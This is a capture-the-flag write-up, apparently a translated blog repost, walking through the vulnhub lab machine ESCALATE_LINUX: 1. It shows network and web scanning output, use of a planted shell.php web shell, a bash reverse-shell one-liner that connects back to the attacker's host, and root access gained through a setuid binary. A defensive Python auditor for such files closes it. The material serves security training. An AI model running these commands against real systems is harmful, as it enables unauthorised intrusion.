Red Team Target Practice: ESCALATE_LINUX: 1

2023-12-21 17:51:14

Information Gathering

1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.140  00:50:56:24:79:77       VMware, Inc.
192.168.12.254  00:50:56:ea:3b:29       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.365 seconds (108.25 hosts/sec). 4 responded

2. netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.140  00:50:56:24:79:77      1      60  VMware, Inc.
 192.168.12.254  00:50:56:ea:3b:29      1      60  VMware, Inc.


3. nmap
Host discovery

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:34 CST
Nmap scan report for 192.168.12.1
Host is up (0.0053s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000052s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.140
Host is up (0.000049s latency).
MAC Address: 00:50:56:24:79:77 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EA:3B:29 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.41 seconds


Port scanning

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:35 CST
Nmap scan report for 192.168.12.140
Host is up (0.0013s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
36591/tcp open  unknown
40519/tcp open  unknown
53585/tcp open  unknown
56347/tcp open  unknown
MAC Address: 00:50:56:24:79:77 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds

┌──(root?ru)-[~/kali]
└─# cat port.nmap | head -n 14 | tail -n 9 | awk -F "/" '{print($1)}' | xargs -n 9 | sed 's/ /,/g'
80,111,139,445,2049,36591,40519,53585,56347


Information gathering (service and OS detection)

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 80,111,139,445,2049,36591,40519,53585,56347 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:40 CST
Nmap scan report for 192.168.12.140
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35483/udp6  mountd
|   100005  1,2,3      53357/tcp6  mountd
|   100005  1,2,3      53585/tcp   mountd
|   100005  1,2,3      59650/udp   mountd
|   100021  1,3,4      34657/tcp6  nlockmgr
|   100021  1,3,4      40519/tcp   nlockmgr
|   100021  1,3,4      45296/udp6  nlockmgr
|   100021  1,3,4      54711/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs         3-4 (RPC #100003)
36591/tcp open  mountd      1-3 (RPC #100005)
40519/tcp open  nlockmgr    1-4 (RPC #100021)
53585/tcp open  mountd      1-3 (RPC #100005)
56347/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:50:56:24:79:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX

Host script results:
| smb2-time:
|   date: 2023-12-19T08:41:05
|_  start_date: N/A
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2023-12-19T03:41:05-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.12.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds


Vulnerability scanning

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 80,111,139,445,2049,36591,40519,53585,56347 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:49 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.140
Host is up (0.00012s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
36591/tcp open  unknown
40519/tcp open  unknown
53585/tcp open  unknown
56347/tcp open  unknown
MAC Address: 00:50:56:24:79:77 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_

Nmap done: 1 IP address (1 host up) scanned in 67.60 seconds


4. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.140
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.140
+ Target Hostname:    192.168.12.140
+ Target Port:        80
+ Start Time:         2023-12-19 16:49:53 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a84b35a8d4e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-12-19 16:50:08 (GMT8) (15 seconds)
---------------------------------------------------------------------------

5. whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.140
WhatWeb report for http://192.168.12.140
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 192.168.12.140
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.29 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 19 Dec 2023 08:53:50 GMT
        Server: Apache/2.4.29 (Ubuntu)
        Last-Modified: Tue, 04 Jun 2019 19:43:52 GMT
        ETag: "2aa6-58a84b35a8d4e-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3138
        Connection: close
        Content-Type: text/html

Directory enumeration

1. gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.140 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.html           (Status: 200) [Size: 10918]
/.html                (Status: 403) [Size: 294]
/shell.php            (Status: 200) [Size: 29]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2. dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.140 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.140/_23-12-19_16-55-42.txt

Target: http://192.168.12.140/

[16:55:42] Starting:
[16:55:43] 403 -  300B  - /.ht_wsr.txt
[16:55:43] 403 -  303B  - /.htaccess.bak1
[16:55:43] 403 -  303B  - /.htaccess.orig
[16:55:43] 403 -  305B  - /.htaccess.sample
[16:55:43] 403 -  303B  - /.htaccess.save
[16:55:43] 403 -  301B  - /.htaccessBAK
[16:55:43] 403 -  304B  - /.htaccess_extra
[16:55:43] 403 -  302B  - /.htaccessOLD2
[16:55:43] 403 -  301B  - /.htaccess_sc
[16:55:43] 403 -  301B  - /.htaccessOLD
[16:55:43] 403 -  303B  - /.htaccess_orig
[16:55:43] 403 -  294B  - /.html
[16:55:43] 403 -  303B  - /.htpasswd_test
[16:55:43] 403 -  300B  - /.httr-oauth
[16:55:43] 403 -  293B  - /.htm
[16:55:43] 403 -  299B  - /.htpasswds
[16:55:44] 403 -  293B  - /.php
[16:56:15] 403 -  302B  - /server-status
[16:56:15] 403 -  303B  - /server-status/
[16:56:16] 200 -   29B  - /shell.php

WEB


Pass a cmd parameter to shell.php to retrieve information!

Reverse shell


payload

/bin/bash -c 'bash -i >&/dev/tcp/192.168.12.128/5656 0>&1'


Privilege escalation

?user6??/??home??user3??find / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
/sbin/mount.cifs
/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/arping
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/umount
/bin/fusermount
/home/user5/script
/home/user3/shell

 user6  /  home  cd user3
cd user3

 user6  /  home  user3  ls -al
ls -al

total 160
drwxr-xr-x 22 user3 user3 4096 Jun  4  2019 .
drwxr-xr-x 10 root  root  4096 Jun  5  2019 ..
-rw-r--r--  1 user3 user3  124 Jun  4  2019 .asoundrc
-rw-r--r--  1 user3 user3   95 Jun  4  2019 .bash_history
-rw-r--r--  1 user3 user3  220 Jun  4  2019 .bash_logout
-rw-r--r--  1 user3 user3  949 Jun  4  2019 .bashrc
drwxr-xr-x 15 user3 user3 4096 Jun  4  2019 .cache
drwxr-xr-x 20 user3 user3 4096 Jun  4  2019 .config
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .dbus
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Desktop
-rw-r--r--  1 user3 user3   23 Jun  4  2019 .dmrc
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Documents
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Downloads
-rw-r--r--  1 user3 user3 9354 Jun  4  2019 .face
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 .gconf
drwxr-xr-x 24 user3 user3 4096 Jun  4  2019 .gimp-2.8
-rw-r--r--  1 user3 user3    0 Jun  4  2019 .gksu.lock
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnome
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnome2
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnupg
-rw-r--r--  1 user3 user3   20 Jun  4  2019 .gtk-bookmarks
-rw-r--r--  1 user3 user3  105 Jun  4  2019 .gtkrc-2.0
-rw-------  1 user3 user3 4710 Jun  4  2019 .ICEauthority
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .local
drwxr-xr-x  5 user3 user3 4096 Jun  4  2019 .mozilla
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Music
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Pictures
-rw-r--r--  1 user3 user3  873 Jun  4  2019 .profile
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Public
-rwxr-xrwx  1 root  root    33 Jun  4  2019 .script.sh
-rwsr-xr-x  1 root  root  8392 Jun  4  2019 shell
-rw-r--r--  1 user3 user3    0 Jun  4  2019 .sudo_as_admin_successful
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Templates
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .thumbnails
drwxr-xr-x  4 user3 user3 4096 Jun  4  2019 .thunderbird
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Videos
-rw-r--r--  1 user3 user3   50 Jun  4  2019 .Xauthority

 user6  /  home  user3  ./shell
./shell
You Can't Find Me
Welcome to Linux Lite 4.4 user6

Tuesday 19 December 2023, 05:19:27
Memory Usage: 334/985MB (33.91%)
Disk Usage: 5/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)

 root  /  home  user3  id
id
uid=0(root) gid=0(root) groups=0(root),1005(user6)

Here we got root simply by executing it directly! I think there should be many more ways to escalate privileges; you can refer to the blogger linked below. There are roughly a dozen escalation methods; this target machine is mainly for practicing Linux privilege escalation!
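As an added defender-side check (not part of the original write-up), the following Python parses `ls -l` output like the user3 listing above and flags the two entries that made this escalation possible: a setuid-root executable sitting in a home directory, and a root-owned script that anyone can modify. The sample lines are constructed from the listing above; `SYSTEM_DIRS` and the finding labels are my own assumptions.

```python
import re

# One "ls -l" line: mode, link count, owner, group, size, month, day, year/time, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)

# Assumed baseline: setuid-root binaries are expected only under these trees.
SYSTEM_DIRS = ("/bin", "/sbin", "/usr", "/lib", "/lib64", "/opt")

# Constructed sample taken from the /home/user3 listing in the write-up.
SAMPLE_LISTING = """\
total 160
drwxr-xr-x 22 user3 user3 4096 Jun  4  2019 .
-rw-r--r--  1 user3 user3  873 Jun  4  2019 .profile
-rwxr-xrwx  1 root  root    33 Jun  4  2019 .script.sh
-rwsr-xr-x  1 root  root  8392 Jun  4  2019 shell
"""


def audit_listing(listing, directory):
    """Return [(path, finding), ...] for regular files a defender should review."""
    findings = []
    system_prefixes = tuple(d + "/" for d in SYSTEM_DIRS)
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if not m or m["mode"][0] != "-":  # skip 'total', directories, symlinks
            continue
        mode, owner, name = m["mode"], m["owner"], m["name"]
        path = f"{directory.rstrip('/')}/{name}"
        setuid = mode[3] in "sS"          # owner-execute slot carries the setuid bit
        world_writable = mode[8] == "w"   # others-write slot
        if setuid and owner == "root" and not path.startswith(system_prefixes):
            findings.append((path, "setuid-root executable outside system directories"))
        if world_writable and owner == "root":
            findings.append((path, "root-owned file writable by everyone"))
        if setuid and world_writable:
            findings.append((path, "setuid executable writable by everyone"))
    return findings


if __name__ == "__main__":
    for path, finding in audit_listing(SAMPLE_LISTING, "/home/user3"):
        print(f"{path}: {finding}")
```

Pipe a real `ls -l` of each home directory into `audit_listing` to get the same triage on a live host; both flagged entries are exactly what a baseline of system-path-only setuid files would have caught before the box was deployed.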

Tools: https://blog.csdn.net/bwlab/article/details/121045674

Repost:

vulnhub Linux privilege escalation target | escalate_linux_1 | tari Blog: a long-postponed privilege escalation box. https://tari.moe/p/2022/escalate-linux-1

Source: https://blog.csdn.net/rx3225968517/article/details/135092581